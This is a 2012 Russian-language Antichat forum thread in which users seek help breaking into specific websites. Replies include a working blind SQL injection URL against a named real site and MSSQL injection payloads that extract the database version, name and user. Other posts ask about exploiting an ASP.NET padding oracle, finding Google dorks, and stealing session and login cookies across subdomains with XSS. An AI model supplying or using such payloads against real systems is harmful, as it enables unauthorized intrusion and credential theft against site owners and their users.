HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.06.2012, 13:43
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=kpm&dir=asc

help
 
Ответить с цитированием

  #2  
Старый 07.06.2012, 15:04
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от qaz  
http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=kpm&dir=asc
help
Код:
http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=rand(if(ascii(substr(version(),1,1))=53,1,0))&dir=asc
5+
 
Ответить с цитированием

  #3  
Старый 07.06.2012, 16:55
lucky_dom
Новичок
Регистрация: 02.06.2012
Сообщений: 5
С нами: 7339286

Репутация: 0
По умолчанию

вопрос по microsoft acces:

нашел полЯ с выводом

теперь если можно примером:

1.как узнать юзера,базу и т.д.

2.как повысить привелегии на

чтение системных таблиц и для иСПОЛЬЗОВАНИЯ

стандартного шелла

спецы помогите!
 
Ответить с цитированием

  #4  
Старый 07.06.2012, 21:25
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от lucky_dom  
вопрос по microsoft acces:
нашел полЯ с выводом
теперь если можно примером:
1.как узнать юзера,базу и т.д.
2.как повысить привелегии на
чтение системных таблиц и для иСПОЛЬЗОВАНИЯ
стандартного шелла
спецы помогите!
Ты в слове "иСПОЛЬЗОВАНИЯ" кнопкой shift неправильно воспользовался.

1) Для того, что бы проверить, надо что-нибудь вывести, для этого используем подзапрос, и так что же мы можем вывести:

1 or 1=@@version-- - Версия

1 or 1=(select db_name())-- - Имя Базы Данных текущего юзера.

1 or 1=(select system_user)-- - Имя юзера владельца данной базой.

/thread30501.html

2)Не понятно
 
Ответить с цитированием

  #5  
Старый 08.06.2012, 02:30
lucky_dom
Новичок
Регистрация: 02.06.2012
Сообщений: 5
С нами: 7339286

Репутация: 0
По умолчанию

По пункту 2 читал оф. Документацию

office.microsoft.com/ru-ru/access-help/CH010072899.aspx

не понятно как все это дело вставлять в инъекцию
 
Ответить с цитированием

  #6  
Старый 08.06.2012, 23:01
br00train
Новичок
Регистрация: 05.06.2012
Сообщений: 1
С нами: 7334966

Репутация: 0
По умолчанию

ASP.NET Padding Oracle Vulnerability

Здравствуйте, хотелось бы узнать, каким же образом можно использовать данную уязвимость? В общем по переходе на ссылку:

Цитата:
Сообщение от None  
site.ru/WebResource.axd?d=zt87v2JeCPKYzqUfGEffpA2
выводится сообщение:

Цитата:
Сообщение от None  
Padding is invalid and cannot be removed.
Все ссылки на самом сайте имеют расширение wbp:

Цитата:
Сообщение от None  
site.ru/link/index.wbp
Мои познания очень неглубоки, так что буду очень благодарен если кто нибудь сможет мне разжевать данную информацию.

Заранее всем большое спасибо...
 
Ответить с цитированием

  #7  
Старый 09.06.2012, 11:53
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #8  
Старый 09.06.2012, 12:22
Try
Новичок
Регистрация: 11.12.2011
Сообщений: 0
С нами: 7589846

Репутация: -1
По умолчанию

Народ, где взять дорки для Гугла?
 
Ответить с цитированием

  #9  
Старый 09.06.2012, 13:10
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами: 8814194

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #10  
Старый 10.06.2012, 02:51
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию

Возможно ли с помощью XSS получить куки с другого под домена?

(need.site.com)

В данной ситуации :

Цитата:
Сообщение от None  
.site.com PHPSID=*****************
xss.site.com PHPSID=2****************
need.site.com PHPSID=3****************; login=123; pass=123
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...